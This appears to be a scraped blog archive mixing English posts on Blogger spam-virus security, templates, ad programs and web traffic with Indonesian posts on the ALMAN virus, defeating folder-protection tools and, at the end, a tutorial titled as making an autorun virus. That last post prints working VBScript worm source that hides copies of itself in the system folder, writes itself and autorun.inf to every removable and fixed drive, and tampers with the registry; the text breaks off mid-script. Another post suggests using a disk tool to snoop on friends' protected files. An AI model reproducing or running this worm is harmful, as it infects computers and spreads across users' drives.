Internet Security and Blogger Virus

The internet was abuzz with talk that Blogger.com site got hacked and was compromised. Blog owners suddenly found fake spam Posts in their Blogs which contained links to virus downloads and data mining sites. Some were faced with inexplicable web page load times and yet others noticed odd codes appearing in their templates. The natural reaction is to blame all these on the people responsible for the viral attacks, even though that might not be the case. In this article, we shall share with you some tips that we have learned on internet security and protection. This include the actions we can take to prevent or minimize the possibility of having Blogger blogs hacked or hijacked.

Is Blogger.com safe?

The article in BBC, Bloggers battered by viral storm, reported that the latest incidents were the work of a group of hackers who had been mounting attacks since January. They used spam messages posted on bogus sites or sent through email to trick users to download malicious programs. The links can sometimes be couched as Youtube links or digital greeting card links. Also, the email subjects contained informal internet jargon which led recipients to think that the mail came from their friends.

In an official response yesterday, Eric of the Blogger team had confirmed that “Blogger was not compromised. Instead, the blog posts are from bloggers whose machines were compromised by a Trojan horse. These bloggers had their mail2blogger email addresses in their computers' address books ... so when the malicious software spammed every address in their address book with its content, a copy of that email was posted to their blog.”

In short, the Blogger platform is safe and if any, the Blog owners should ensure that their own computers are checked and protected against malware. Where then does this leave us?

How the virus got into Blogs

Before we look at the preventive actions to take, we may want to know how these fake posts made their way into our Blogs. When you are logged into Blogger, you can see under Settings -> Email a “Mail-to-Blogger Address” feature. This enables you to post to your Blog by emailing the Post content to a mail-to-blogger address.






For those who have not used this feature, you can set up the address by entering a word or characters into the part in red. This will be the address to which posts can be sent.

user.xxxxxx@blogger.com


If you have checked the “Publish” box, any message that is sent to this address will automatically get published in the Blog. If the “Publish” box is unchecked, the message will be saved and you have to log in to your Blogger account to publish it. The email subject heading will appear as the Title of the Blog Post.

Although this is a useful feature for people on the go, it is also one that can be exploited. All it takes is for anyone to post an email to this address and whatever is in that email will appear in your Blog. It is therefore imperative that this address remain secret and confidential and anybody who is not authorized to post on your Blog should not know about it.

The moment a virus takes root in your computer, it can send malicious posts to the email addresses saved in your system's address book. If the above email address is one of them, you will see the post in your Blog. Since your Blog is legitimate, your readers and friends may read the post and click some of the links thinking that you would not put harmful material on your Blog. Once they do that, their computers may inadvertently be infected with the malware and they in turn have malicious links appear in their own blogs, and the cycle continues.

Preventive Steps to ensure Blog Security

1. Scan Computer and Protect against Threats

This sounds obvious and yet there are many who do not see the need to protect their systems against viral threats. Some may find the scanning time long (stretches to an hour for a full scan) or do not have a habit of scanning their systems. Others may find it costly to pay for an anti-virus software license. Always consider the alternative – the risk of losing all your data or having to reformat your hard drive – and you would probably agree that a little effort goes a long way to ensure a peace of mind.

If you don't have an updated antivirus software installed in your computer, make it a point to scan your computer using one of the free online virus scanners, such as:-

a. Trend Micro Housecall
b. BitDefender Online Virus Scanner
c. Kaspersky Online Scanner
d. F-Secure Online Virus Scanner
e. Symantec Security Check

If you Google “online scanners”, you may see many sites which claim to provide free online virus scans. While many are authentic, there could well be a few which are not. Check them out if you'd like and stick to the tried-and-tested sites for future scans.

You can also download and install the free Google Pack and include the Norton Security Scan which eliminates viruses and the Spyware Doctor which removes spywares, adwares, trojans and keyloggers.

Another free software that we highly recommend is AVG Anti-Virus software. Go for the Free Edition. For a complete protection, install as well ZoneAlarm Firewall if you are not using your MS Windows Defender. These softwares update their programs and definitions regularly and the reviews on them have been very positive.

2. Configure Mail-to-Blogger Address

If you see a need to post to your blog via email, or think that others know your mail-to-blogger address, go back to Settings -> Email and pick/change the address into something that nobody can easily guess. Since the intent of this function is to have posts published without having to log in to Blogger, ticking the “Publish” option makes sense. After saving the Settings, go back to your email software e.g., Outlook Express, Eudora. Remove that mail-to-blogger address from the address book. By making no mention of it anywhere, even if the virus sends out mail to all the addresses in the address book, nothing will be sent to your Blog.

3. Create different email and login addresses

Out of convenience, many people stick to one name for all their logins, emails and signatures. For example, they may have these:-

blog name: myname.blogspot.com
login name: myname@gmail.com
email address given to readers: myname@gmail.com
user: myname


If people are bent on hacking your Blog, it is easy for them to figure out what your login name is and use programs to crack your password. When you create your next blog, consider assigning different names or not using your actual name:-

blog name: blogname.blogspot.com
login name: notmyname@gmail.com
email address given to readers: anothername@gmail.com
user: screenname


4. Set browser security

In Internet Explorer -> Tools -> Internet Options, set the Security level for Internet zone to Medium-High or High. Also, in the later versions, you can turn on the Automatic Website Checking feature in the Phishing Filter settings.

If you are using Firefox, go to Tools -> Add-ons and click the “Get Extensions” link. Look for a popular extension called “NoScript”. What it does is to block JavaScripts and executable files and only allows those that you trust. It makes surfing the net a lot safer, and lessens the chance of unintentionally running malicious scripts.

5. Use third party scripts with care

JavaScripts make our websites dynamic and vibrant, but malicious scripts can cause a great deal of harm. In our eagerness to place nice-looking widgets and interactivity into our sites, we sometimes overlook the fact that third party service providers are not always trustworthy. Some domains last a few days, just enough for the hijacker to place downloadable widget scripts on the sites and to back out of the domain purchase after the cooling-off period. Blogs can also list harmful scripts, some of them blindly copied from other sites while others intentionally created to trick readers.

For instance, you may come across an application that you like and are given a code to place into your template. This code typically contains a link to a file ending with .js extension. When your Blog page is loaded, this script is retrieved from the site where the file is stored and it runs in the background. Some prudent Blog owners do take the trouble to go through the script language and ascertain that there is nothing wrong with it. However, because the file is hosted in that provider's server, if they should decide to change it later and throw in something extra, you would have unknowingly introduced that into your Blog.

For the same reason, we have cautioned readers against downloading ready-made and customized templates from unknown or untested sources. Since not all of us are technical experts, we may not notice an undesirable script hidden somewhere in the template. Hence, for our guides such as the three columns template guides, we prefer to show you how to DIY and customize your own template. In this way, you know what goes into it and can easily reverse the change in future.

6. Watch what we say or write

We thought we should add this. Many of these people either do it for the challenge or out of spite. Just as wearing skimpy clothes invites unnecessary attention and opening our door invites thieves, words and actions can give hackers the excuse to compromise your site. Observe basic courtesy and net etiquette. Be modest about your site. Every site can be the target of hijacks, including ours; no site is invulnerable.

What to do if Blog is hacked?

Despite all the security and preventive steps, if the day should come when the Blog contents disappear, the first thing to do is to scan the computer for viruses and malware. Do not login to your email or other accounts since this might open up more doors for the virus. Once the system is completely scanned and rendered safe, you may login to your Dashboard and view the Settings. Take note of the information that has been altered.

It is also possible that you are unable to login because the password has been changed, or that the Blog and Blog Posts are deleted. Write to the Blogger Support Team using another email account. Give them as much details as possible and allow them time to investigate the cause. Since Google servers would have backed up our data, it should be possible for them to reinstate your Blog upon proof of ownership.

Where the contents cannot be entirely retrieved, you may have to re-create the Blog. In moments like this, you would appreciate the importance of keeping backups of the template source codes and saving copies of the articles you have written.

Further reading:-

As mentioned, if the Blog page load takes longer than usual, it is not necessarily caused by a virus. Blogger.com could be experiencing a downtime, or the external sites where information is retrieved from may be causing the delay. This usually happens when we put a number of third party applications and widgets into our site, such as advertising services, gadgets and scripts. Our article on Faster Web Page Load Time explains how you can check the page load time and improve the speed.

© Tips for New Bloggers

Read more.....

Apple Circle Template

Amazingly new skin! Nearly the exact imitations of the Apple Macintosh! Even has
the top header....

Template Name: Apple Circle
Preview: See Demo
Author: Luke
Date Created: September 25th 2006
Description:
Amazingly new skin! Nearly the exact imitations of the Apple Macintosh! Even has the top header, but unfortunately, it does not minimize! The navigation is amazingly done, the copyright mixes in with the navigation. Two boxes, Graphite and Aqua colored, for fast news, and other things. The news is short, but can be optimized to add a iFrame in it! You can't say no to this skin! Use Rights Only!

Use Rights:
You may use the skin for your own use, but not redistrubute or edit the skin. You may edit the navigation images, but not the entire skin itself. Leave copyrights intact.

| Download Now |

Read more.....

Creamy Orange Template

This skin should be in the WOW section! Amazingly effective skin, perfect for
anything! Orignally for a TV Show Company,
but later then released for thepublic...

Template Name: Creamy Orange
Preview: See Demo
Author: Luke
Date Created: August 19th 2006
Description:
This skin should be in the WOW section! Amazingly effective skin, perfect for anything! Orignally for a TV Show Company, but later then released for the public... this website is incredible. The nice orange and cream color gives it a unique look, must be downloaded and used! Use Rights Only!

Use Rights:
You may use the skin for your own use, but not redistrubute or edit the skin. You may edit the navigation images, but not the entire skin itself. Leave copyrights intact.

| Download Now |

Read more.....

NetAudioAds [ Pay Per Play ]

Get paid on 100% of your website traffic, no clicks necessary! How is this possible? CLICK HERE

A revolution in advertising is taking place, millions of dollars are being earned, will you miss the boat? CLICK HERE
Get a guaranteed 100% conversion rate on your website visitors CLICK HERE
Pay-Per-Play is due to officially launch on February 1st, 2008. Now is the time to tell everyone you know about the free PPP opportunity.

We need as many websites as possible to register to run PPP ads before February 1st as possible so that we ensure top dollar from our advertisers.
Make sure to read through the PPP tutorials because there is valuable information there to help you kick off your PPP business in a professional manner.

We now have over 12,000 registered members who have brought on over 8 million new websites in less than 2 months.
PPP is a rare opportunity to lock in major residual flows of income for the web's newest and fastest growing advertising vehicle ... Pay-Per-Play.

Exciting news and Updates from Voice2Page NetAudioAds
---------------------------------------------------------------
We are launching the new statistics system tonight or early tomorrow morning!
Changes include:
We added 'Yesterday' totals to the existing information
'Today, Yesterday, This Month, Last Month, This Year, Last Year and Total'

We know that it has taken a long time to get the statistics pages online.
We have had to filter out many, LARGE, malicious attempts to game the system and
we also needed to work with the BPA team for proper reporting of this large of a
number of ad play records.
---------------------------------------------------------------
Many, many people have asked for keywords to filter ads to their sites.
We have added two new items to your code fragment that you embed in your HTML:
You see new variables naa_keywords and naa_noads.
You may add these to your code to specify which keywords you LIKE
as well as which keywords that you would prefer NOT to advertise on your pages

We require that naa_sitename be no longer than 32 chars and the new fields
must not exceed 64 characters each.
---------------------------------------------------------------
ADVERTISING starts this weekend!!! We are moving into launch mode!!!!!!!

We will start slow, with some smaller, tolerant advertisers while we
insure that all systems are go and working properly.
---------------------------------------------------------------
Watch this news space and the Blogs and Forums at Pay-Per-Play for more news

---

Regard,

MiztaPEE

Read more.....

ContentLink™

In Text Advertising Solution for Publishers

What are ContentLinks?
ContentLinks are contextually relevant keywords discovered in real time on a publisher’s web page that are automatically turned into a link to the most relevant and highest paying text ad from one of Kontera’s thousands of advertisers.

What ContentLink can do for you?
Kontera’s ContentLink In-Text Advertising solution lets you monetize your content in real-time, enabling an incremental increase in ad revenue by providing a new source of untapped ad inventory that does not compete with the other ad programs running on the site. ContentLink™ also creates a valuable user experience by serving relevant and informational ads that match the user’s interest and frame of mind.

The ContentLink advantage:
At the core of Kontera’s patent-pending technology are a set of proprietary algorithms that enable publishers to maximize their revenue and earn higher Click Through Rates. Statistical text analysis and clustering methodologies are used, combined with semantic analysis procedures that utilize a proprietary taxonomy of subjects, keywords, and unique relationships between them. Kontera’s platform, optimized and proven on thousands of web pages over the last seven years, facilitates the analysis of each web page in real-time. Keywords and topics are then extracted and ranked, and then instantly matching to the advertiser’s most relevant text ad. The greater relevancy between the content, keyword and text ad made possible by Kontera’s proven technology increase the publisher’s revenue.

ContentLink provides :
Increased Incremental Revenue – ContentLink maximizes your advertising revenue by running In-Text Advertising alongside your existing banner, text, or other ad units, thereby providing you with a new revenue stream from the content within your site.

Untapped Sources of Ad Inventory – Because In-Text Advertising creates a new type of advertising real estate from within the content of your own website, the revenue opportunities are nearly limitless.

High Click-Through Rates (CTR) – Kontera’s proprietary technology serves the most relevant In-Text keyword advertising, and therefore generates higher CTR’s than most other contextual advertising vehicles, translating into more revenue for you.

Instant Implementation – Kontera’s user-friendly solution will have you up-and-running in minutes. All you need to do is place Kontera’s JavaScript tag on your site pages.

Positive User Experiences - Not only is the ContentLink superior in its contextual relevance, the ad itself only appears when the user mouses-over the ContentLink, and does not automatically invade the user’s experience. The user choose whether to interact with the ContentLink or to ignore it altogether. Further, it only contains either a relevant ad or an internal link to another relevant page within your site or network of sites. ContentLink provides users with relevant information when they are most interested and receptive to receive it.

Editorial Integrity – Since ContentLinks are added dynamically, in real-time, only after the text on the site has been loaded, you retain complete control over your web content. No text is compromised, and there is no interruption of the speed of page-loading. The ultimate integrity of your editorial content and your users’ experience is therefore maintained.

Content Monetization – Whether your content includes articles, user-generated postings, product reviews, blogs, or social networking sites, Kontera’s dynamic contextual analysis lets you serve ContentLinks as soon as new and relevant content is posted.

Publisher Control & Customization – You control the number of ContentLinks which appear on your content, the color of the link, its placement, its look and feel the way the window opens once a prospect clicks, as well as , competitors´ filtering, keyword filtering, etc..

24/7 Customer Service – Your dedicated Kontera account manager will provide real-time support 24/7 to answer your questions and make sure that your revenue is optimized. Kontera’s professional customer service teams work with you to ensure that your ContentLink In-Text advertising is a commercial and editorial success.

Online Reporting – Kontera’s technology platform provides an online interface for watching your money. See how much revenue you are generating on a daily basis!

New Publisher Value-Added Functionality – Kontera offers new features to increase user time spent, stickiness and in turn, your revenue:
Intra-Site Links – Increase website stickiness by offering intra-site links to contextually relevant content on your website
3rd Party Information Links – Add user value by offering links to external information including dictionaries, encyclopedias and more

ContentLink Private Label Publisher Solutions:
Looking to increase your advertising revenue? Kontera enables leading publishers to take control of their advertising operations and increase their ad revenue with our comprehensive advertising management solution. Click Here to read more about ContentLink Private Label Publishers Solutions

Read more.....

Increase Your Website Traffic

I don't know about you, but when I first entered the world of internet marketing I thought I could just submit my newly finished website to a few search engines, then sit back as the visitors flocked to my site.

I imagined that people would arrive on my website, as if by magic, purchase goods,and perhaps come back again for more.
A week or so later I came down to earth with a big bump.
I realised that it would take a bit of time and effort to see the results that I was dreaming about!
Since my reality check, I have learned all about the weird and wonderful ways of internet marketing.

In this article I will tell you about my top 5 free ways of increasing website traffic.
All these methods are completely free and if you spend some time on them you will find that they work consistently.

(1)Writing Articles

Writing an article on a subject related to your website and getting that article published has two major benefits:
- People who are interested in your article will read it and often click on the URL in your resource box find out more. This gets you another free targeted visitor. Targeted, because that reader wants to find out more on the subject of your article, which is hopefully related to the subject of your website.

- Every publisher of your article must also publish your "resource box". Adding a resource box with your URL to all of your articles will increase the number of links leading back to your website, which in turn helps to increase your search engine position
For a list of directories to submit your article to, see Article Submission Directories

(2)Forum Networking
There are many discussion forums on the internet, on every topic you could possibly imagine.

Most discussion boards allow posters to attach a "Signature" with their post containing additional information about themselves, such as their name, URL and sometimes even an advertisement.

By visiting a few forums regularly and participating in the discussions, asking and answering questions, you can build up trust with other forum members, whilst at the same time getting free exposure for your website.
Just try to make a useful contribution to the forum - be sure to read the forum rules and don't spam!

(3)Reciprocal Linking Website Traffic

Reciprocal linking has two main benefits for you.
Firstly, the more links that you exchange, the more chance there is that someone will follow a link from another site and land on your website.

Secondly, your website will be perceived more importantly by search engines.
The more links you have from other sites, the greater your chance of getter ranked more highly by all the search engines.

Here are some Dos and Don'ts to help you get more out of your link exchanges.

- Do link with sites that will be of interest to your visitors.
- Don't link with pages that have unorganised link directories with hundreds of links on each page. This won't benefit you with increased traffic or search engine rankings.
- Do link with sites that have a clearly labelled "Link Directory" from their main page. You aren't likely to get much traffic from a hidden or hard to find link directory.
- Don't use link farms or FFA pages. You are unlikely to get extra traffic using these methods and the search engines may penalise you.
- Do use link directories to help you find link partners. You can find some Link Exchange Resources here
- Do stay organised. Use link exchange software, or a spreadsheet to keep track of the link exchanges you have requested and the contact details of the webmasters.

(4) Email Signatures
This is a very simple, but often forgotten way of increasing your website visitors.
Most of us are sending lots of emails a day, but many of us just sign them with just our name, or perhaps nothing at all.
Instead, why not end your emails with a short signature containing your name, a bit about your website along with the URL?

Keep the signature short (4 lines), to the point and avoid hype or SHOUTING.
You may be surprised at the extra visitors you receive through doing this. It's amazing how curiosity will lead the recipients of your email to click on your link!


(5)Using Traffic Exchanges
Finally, this is one easy way to guarantee instant hits to your website. You can build up credits for free by surfing or building up a downline to surf for you.

The downside of this method is that the visitors you receive from traffic exchanges are not as targeted as the visitors that you will receive via the other methods that I have described.
The reason for this is that people surf traffic exchanges for one reason - to earn as many credits as possible in as short a space of time as possible!
This gives you a challenge - how do you attract the attention of someone who is looking at your web page for 20 seconds or less?

Here are two tips -
- Know your market - spend some time surfing on the exchange that you are advertising on and pay attention to the types of web pages being advertised. Make sure that the pages you advertise are going to interest your target market.
- Use a short, simple attention grabbing page that can be read in a few seconds - there is no point advertising a huge page of text that takes 5 minutes to read. The chances are, your visitor will get bored and click on the "next" button without giving your page a fair chance.

Regularly invest some time in each of these 5 traffic generating methods and you will see your web statistics moving in the upwards direction before you know it.

regard,

MiztaPEE

Read more.....

The Key to Successful Marketing

If your business has limited marketing resources in terms of people, expertise and materials then you might want to consider outsourcing your marketing functions to an independent marketing professional or a marketing and promotions agency. Small businesses, downsized companies, and expanding corporations all have different reasons to outsource.

Marketing can be an expensive activity and maintaining in house resources can really make this a difficult program to commit to. But marketing is a very mportant part of business success so allowing someone else to focus on marketing gives companies a chance to focus on their core business and areas that will enable them to surpass their competition.

Outsourcing marketing resources comes with a price, but this cost is usually lower than it would be if the companies had employed and undertaken in house activities. By eliminating the need to hire full-time employees, using an agency for marketing resources saves companies thousands of dollars on wages, taxes and benefits. You are also gaining expertise in an agency that you might not find in individual employees. In addition to their own staff, agencies also have other resources to help you, such as their own outside contacts, suppliers, designers, copywriters and printers--saving you time as well as money.

When you hire an outside agency, you are hiring experts in marketing. These are professional people who can focus on all your marketing needs and not be hindered by your internal politics, relations between employees, or lack of knowledge among staff in relation to marketing strategies and how they integrate with business strategies. Marketing professionals whether independent or through a marketing agency - will often have more experience in the particular aspects of marketing than you staff, and undoubtedly more than you could pay for in an employee. Also, since they work with other clients, they have seen what works and what doesn't in other company campaigns. This knowledge translates to more efficient and effective marketing for you as you have the benefit of their hindsight.

As with outsourcing any business function, allowing an outside agency to do your marketing or advertising brings a certain kind of objectivity with it. Sometimes you just need a fresh perspective to overcome difficulties and to achieve specific goals. An objective marketing professional will help you see things you might otherwise miss and will be more open to offering a range of fresh ideas as opposed to a bunch of tired ideas that you might have been toying with for years but have yet to implement.


About the author:
rudiz vendita is the owner of FU Marketing which is a premier resource for marketing information. for more information, go to Successful Marketing Webs

By MiztaPEE

Read more.....

ALMAN, Virus Yang Doyan Makan File EXE

Teknik pertahanan virus dengan membuat file induk berekstensi exe, com, ataupun scr di drive system saat ini sudah mulai kehilangan popularitas alias sudah ketinggalan zaman. Pasalnya, trik yang banyak digunakan oleh virus-virus lokal ini sudah sedemikian lumrah, mudah dikenali dan dijinakkan. Cukup dengan memakai windows task manager saja atau pake tools lain semisal ProcessExplorer, System Task Manager, ProcLister, IceSwords dan semacamnya kita dapat dengan mudah mengenali file induk yang dibuat oleh virus lalu mematikan proses atau bahkan menghapus filenya sekalian. Sebutlah sederetan virus lokal seperti brontok, kangen, decoil, Mr. CoolFace, Wayang, Blue Fantasy, dan Moon Light ternyata masih mengusung teknik seperti itu.

Selangkah lebih maju, kspoold bersaudara muncul mengusung teknik yang lebih cerdas dengan cara membuat file avmeter32.dll atau avwav32.dll di direktori system yang akan menginjeksi file explorer.exe. Namun demikian, kehadiran kspoold di komputer kita dengan segera dapat disadari selain karena aksinya merubah file doc dan xls menjadi exe di flash disk (varian barunya katanya merubah seluruh file doc di komputer menjadi bmp) juga karena virus ini masih menulis sebuah file bernama kspoold.exe di direktori system yang dapat dilihat melalui task manager.

Sekitar 1 bulan kemarin saya menemukan sebuah virus baru (mungkin juga ini virus lama, tetapi saya baru menemukannya) yang saya juga tidak tahu apakah virus tersebut made in Indonesia atau bukan, tetapi yang jelasnya virus ini hadir dengan teknik penyamaran yang lebih baik lagi.

Virus yang dikenali dengan nama ALMAN oleh AVG dan Kaspersky ini terbilang cukup unik karena selain kemampuannya menginfeksi file exe, file induk yang dibuatnya cukup sulit dilacak karena bukan berupa file executable tetapi file berekstensi dll sehingga aktivitasnya tidak akan tampak jika dilihat melalui jendela task manager.

Aksi sang virus
Jika menginfeksi system, virus alman akan membuat 2 file di direktori system yakni wmdrtc32.dll dan wmdrtc32.dl_. File wmdrtc32.dll dibuat dengan ukuran sekitar 40 KB, diset beratribut normal. File ini ditugaskan untuk menginjeksi file explorer.exe miliknya windows setiap kali dijalankan. Ini saya ketahui setelah mengintipnya dengan tools gratisan a-squared HijackFree yang sebenarnya juga sedang terinfeksi. Ternyata file wmdrtc32.dll terdaftar sebagai salah satu module yang sedang digunakan oleh file explorer.exe. Demikian halnya file-file executable lain yang telah terinfeksi ketika dieksekusi akan menggunakan file tersebut sebagai salah satu modulnya. Ini mirip dengan aksi yang dilakukan oleh file avmeter32.dll atau avwav32.dll milik virus kspoold. Selanjutnya file wmdrtc32.dl_ berukuran sekitar 26,5 KB dan diset beratribut system dan hidden. Disinilah terlihat kelihaian teknik social engineeringnya karena jika dilihat sepintas lalu, file wmdrtc32.dl_ seolah-olah merupakan file milik windows yang telah direname oleh virus dan digantikan dengan file lain dengan ukuran berbeda. Dengan demikian, kita dapat terkecoh hanya menghapus file wmdrtc32.dll (40 KB) kemudian mengembalikan ekstensi dll pada file wmdrtc32.dl_ (26,5 KB) karena mengira itu filenya windows.
Mengenali file yang terinfeksi

Sebenarnya cukup sulit untuk mengenali file exe yang telah diinfeksi oleh virus ini hanya dengan melihatnya saja. Hal ini disebabkan karena sebagian besar file yang diinfeksinya tetap dapat berjalan dengan normal kecuali beberapa file seperti PCMAV-CLN.exe dan PCMAV-RTP (keduanya antivirus buatan PC Media) yang pernah saya temui.

Namun demikian, sebenarnya jika kita dapat menghafal ukuran file-file executable kita, maka file yang terinfeksi dapat segera dikenali dengan melihat pada perubahan ukuran filenya. Setiap file exe dapat diinfeksi sampai dua kali oleh virus ini, masing-masing dengan penambahan ukuran file sebesar 28 KB dan 40 KB. Maksudnya, jika sebuah file telah terinfeksi dan bertambah ukurannya sebesar 28 KB, maka infeksi selanjutnya akan menambah ukuran file sebesar 40 KB, demikian pula sebaliknya. Jadi, setiap file yang terinfeksi dapat bertambah ukurannnya sebesar 68 KB.

Mematikan Proses Virus
Sebenarnya saya tidak tahu dunia program sama sekali. Jadi saya tidak punya jurus jitu melawan virus ini karena file wmdrtc32.dll tidak dapat di delete begitu saja. Hanya saja karena file dll yang dibuat juga menginfeksi file explorer.exe seperti yang dilakukan oleh kspoold, saya jadi teringat dengan artikel yang pernah saya download dari vaksin.com. Diartikel tersebut ada source code remover sederhana untuk mematikan proses virus sekaligus menghapus file virusnya yang bias dibuat dengan notepad. Source code ini dapat dimodifikasi untuk mematikan proses serta menghapus file wmdrtc32.dll dan wmdrtc32.dl_ yang terdapat di direktori system. Saya tidak menyertakan source codenya disini karena artikelnya akan semakin membengkak ukurannya. Selain itu saya malas dicap suka menjiplak tulisan orang. Jadi kalau mau download sendiri aja di situsnya vaksin.com!
Membersihkan file terinfeksi

Lantas bagaimana nasib file-file exe yang telah terinfeksi? Sampai saat ini, liris terakhir PCMedia yakni PCMedia RC22 belum mengenal virus Alman sama sekali, sedangkan Ansav mengenalnya dengan nama Sality tetapi tidak dapat membersihkannya, file terinfeksi akan dihapus. Hal tersebut tidak berbeda jauh dengan Anti Virus AVG yang hanya main delete saja ketika bertemu virus ini. Berhubung karena saya bukan seorang programmer dan tidak tahu-menahu sama sekali seputar dunia pemrograman, saya hanya mengandalkan kaspersky (bisa juga pake McAfee) update baru yang telah dapat mengenal virus ini dengan baik serta dapat membersihkan file-file yang terinfeksi meskipun tidak semua file dapat dibersihkan dengan sempurna.
Oleh eL!t!zT
Jasakom

Read more.....

Membongkar File-file terproteksi

Memang tidak mungkin melihat sebiji virus atau bakteri hanya dengan mata telanjang. Mungkin itulah sebabnya mengapa di zaman Fir'aun belum dikenal istilah virus ataupun bakteri. Tetapi dengan ditemukannya mikroskop, makhluk-makhluk mikroskopis yang kerap kali menyusahkan manusia tersebut berhasil dilihat, ditelanjangi, dan dianalisis secara detail. Kesimpulannya, apa yang dapat kita lihat sangat bergantung pada perlengkapan (instrumen) apa yang kita gunakan.

Tidak berbeda jauh dengan dunia nyata, dalam dunia komputer pun hukum dasar itu tetap berlaku. Dengan peralatan (baca: software) yang berbeda, kita akan melihat file/folder yang berbeda pula. Sebagai contoh jika menggunakan tools bawaan windows yakni windows explorer untuk menjelajahi isi hard disk, pada kondisi defaultnya kita tidak akan dapat melihat file-file dan folder yang diset beratribut hidden dan system, kecuali jika kita sedikit melakukan perubahan setting pada folder option atau di registrynya.

Akan sangat berbeda ceritanya ketika kita menggunakan tools lain misalnya Partition Magic 8. Dengan aplikasi Partition Browser dari Partition Magic 8 ini, kita dapat melihat seluruh file dan folder beratribut hidden dan system (super hidden) tanpa perlu melakukan perubahan setting di folder option atau registry terlebih dahulu. Saat ini sudah sangat banyak aplikasi yang ditawarkan guna melindungi arsip atau program-program rahasia kita di komputer sehingga tidak mudah dilacak dan dibongkar oleh tangan-tangan lain. Aplikasi-aplikasi tersebut ada yang bersifat freeware serta sebagian lainnya berlisensi. Selain itu, metode proteksi yang ditawarkan setiap software tersebut juga berbeda-beda pula.

Salah satu aplikasi freeware yang sempat penulis coba adalah Folder Lockbox yang dapat diunduh dari situs resminya www.folderlockbox.com atau dapat juga diunduh di www.freewarefiles.com. Meskipun bersifat freeware, aplikasi ini cukup bagus karena tidak meninggalkan jejak pada popup menu dan juga dilindungi dengan password.
Ketika membukanya, kita harus memasukkan password terlebih dahulu. Dengan aplikasi ini sebuah folder akan disembunyikan sehingga sekalipun dicari dengan fasilitas search milik windows atau kita browse menggunakan Partition Magic tetap tidak akan ketemu. Hebatnya lagi, aplikasi ini dapat diaktifkan sampai ke safe mode (tetapi tidak akan aktif pada safe mode with command prompt dan hanya dapat digunakan untuk melindungi satu folder saja). Dengan begitu, untuk kelas yang benar-benar pemula dan belum terbiasa mengakses windows lewat safe mode with command prompt atau dos, tingkat proteksi folder/file dengan aplikasi ini sudah cukup lumayan. Benarkah demikian?

Jika anda pernah menginstall aplikasi bernama Paragon Rescue Kit 4 yang membundel salah satu aplikasi bernama Image Explorer, maka anda akan mulai meragukan kehandalan proteksi dari Folder Lockbox. Dengan Image Explorer tersebut, kita dapat melihat dan menjelajah isi folder yang sedang diproteksi oleh folder lockbox serta bisa membuka dan memindahkan setiap isinya ke tempat lain sekalipun kita hanya booting lewat mode normal. Jika ingin mencobanya, anda bisa menemuinya di www.paragon.ag atau di dalam CD majalah Komputer Aktif edisi 145.
Tampilan antar muka dari Image Explorer sangat sederhana dengan beberapa menu pada popup menunya, diantaranya export yang berfungsi untuk mengcopy isi folder tertentu ke tempat lain serta fitur-fitur lain yang cukup menarik (aku malas merincinya satu-persatu, capek ngetiknya) Selain Folder Lockbox, tools lain yang juga bisa ditelanjangi sistem proteksinya oleh Image Explorer yang sempat aku coba (karena keterbatasan pengetahuanku) adalah Hide File and Folder serta Easy File and Folder Protector yang bisa dicomot dari www.softstack.com. Silahkan anda mencoba sendiri aplikasi-aplikasi protektor lain yang kian banyak bertebaran dimana-mana misalnya Lock Folder, Folder Security, dan masih banyak lagi (persediaan hampir tak terbatas).

Sekedar informasi, file executable dari Image Explorer ini hanya berukuran sekitar 960 KB, cukup mungil dan praktis untuk memulai kebiasaan mengintip dan mengerjai data-data rahasia teman. Setelah Paragon Rescue Kit 4 diinstall, anda dapat mengcopy Image Explorer ke komputer lain tanpa harus menginstallnya lagi. Beginilah tampilan antar muka dari aplikasi Image Explorer:
Gambar

Read more.....

Membuat dan Menghapus Virus Autorun tanpa Antivirus

Artikel ini berguna untuk melengkapi artikel sebelumnya, bahan yang digunakan sebagai sampel virus ini yaitu virus dengan nama k4l0n6. Sebelumnya tulisan ini hanyalah bersifat edukasi, klo anda tertarik silakan baca artikel ini sampai tuntas. Tapi klo anda kurang suka ato pernah membaca topik ini, lebih baek jangan di teruskan membaca.

Adapun cara membuat virus autorun sebagai berikut

1. script coding pertama

[autorun]
shellexecute=wscript.exe k4l0n6.sys.vbs

simpan coding tersebut dengan nama dan ekstensi file “autorun.inf” (tanpa tanda petik)

2. script coding kedua
'Kalong-X2
'Varian dari Kalong.VBS
on error resume next

'Dim kata-kata berikut
dim rekur,syspath,windowpath,desades,longka,mf,isi,tf,kalong,nt,check,sd

'siapkan isi autorun
isi = "[autorun]" & vbcrlf & "shellexecute=wscript.exe k4l0n6.sys.vbs"
set longka = createobject("Scripting.FileSystemObject")
set mf = longka.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do

'buat file induk
Set windowpath = longka.getspecialfolder(0)
Set syspath = longka.getspecialfolder(1)
set tf = longka.getfile(syspath & "\recycle.vbs")
tf.attributes = 32
set tf = longka.createtextfile(syspath & "\recycle.vbs",2,true)
tf.write rekur
tf.close
set tf = longka.getfile(syspath & "\recycle.vbs")
tf.attributes = 39

'sebar ke removable disc ditambahkan dengan Autorun.inf
for each desades in longka.drives

If (desades.drivetype = 1 or desades.drivetype = 2) and desades.path <> "A:" then

set tf=longka.getfile(desades.path &"\k4l0n6.sys.vbs")
tf.attributes =32
set tf=longka.createtextfile(desades.path &"\k4l0n6.sys.vbs",2,true)
tf.write rekur
tf.close
set tf=longka.getfile(desades.path &"\k4l0n6.sys.vbs")
tf.attributes = 39

set tf =longka.getfile(desades.path &"\autorun.inf")
tf.attributes = 32
set tf=longka.createtextfile(desades.path &"\autorun.inf",2,true)
tf.write isi
tf.close
set tf = longka.getfile(desades.path &"\autorun.inf")
tf.attributes=39
end if
next

'Manipulasi Registry
set kalong = createobject("WScript.Shell")

'Ubah IE Title
kalong.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title",":: X2 ATTACK ::"

'Ubah tulisan pertama pada text box menu RUN
kalong.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\a", "KALONG-X2/1"
kalong.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\MRUList", "a"

'Buat pesan saat Windows Startup
kalong.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption", "KALONG-X2"
